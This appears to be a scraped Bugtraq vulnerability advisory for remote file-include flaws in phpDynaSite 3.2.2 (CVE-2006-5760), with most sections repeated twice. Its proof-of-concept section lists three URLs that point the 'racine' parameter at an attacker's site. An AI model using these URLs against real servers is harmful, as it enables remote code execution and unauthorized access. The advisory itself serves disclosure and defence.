PHPDynaSite Multiple Remote File Include Vulnerabilities
BID:20921
Info
PHPDynaSite Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20921 |
| Class: | Input Validation Error |
| CVE: |
CVE-2006-5760 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 04 2006 12:00AM |
| Updated: | Jul 06 2016 02:40PM |
| Credit: | Dr.Pantagon is credited with the discovery of this issue. |
| Vulnerable: |
phpDynaSite phpDynaSite 3.2.2 |
| Not Vulnerable: | |
Discussion
PHPDynaSite Multiple Remote File Include Vulnerabilities
Multiple remote file-include vulnerabilities affect phpDynaSite because the application fails to sufficiently sanitize user-supplied input to affected scripts and parameters.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Multiple remote file-include vulnerabilities affect phpDynaSite because the application fails to sufficiently sanitize user-supplied input to affected scripts and parameters.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Exploit / POC
PHPDynaSite Multiple Remote File Include Vulnerabilities
Attackers can exploit these issues via a web client.
The following proofs of concept are available:
http://www.example.com/[path]/function_log.php?racine=http://attacker's site
http://www.example.com/[path]/function_balise_url.php?racine=http://attacker's site
http://www.example.com/[path]/connection.php?racine=http://attacker's site
Attackers can exploit these issues via a web client.
The following proofs of concept are available:
http://www.example.com/[path]/function_log.php?racine=http://attacker's site
http://www.example.com/[path]/function_balise_url.php?racine=http://attacker's site
http://www.example.com/[path]/connection.php?racine=http://attacker's site
Solution / Fix
PHPDynaSite Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
PHPDynaSite Multiple Remote File Include Vulnerabilities
References:
References:
- phpDynaSite Home Page (phpDynaSite)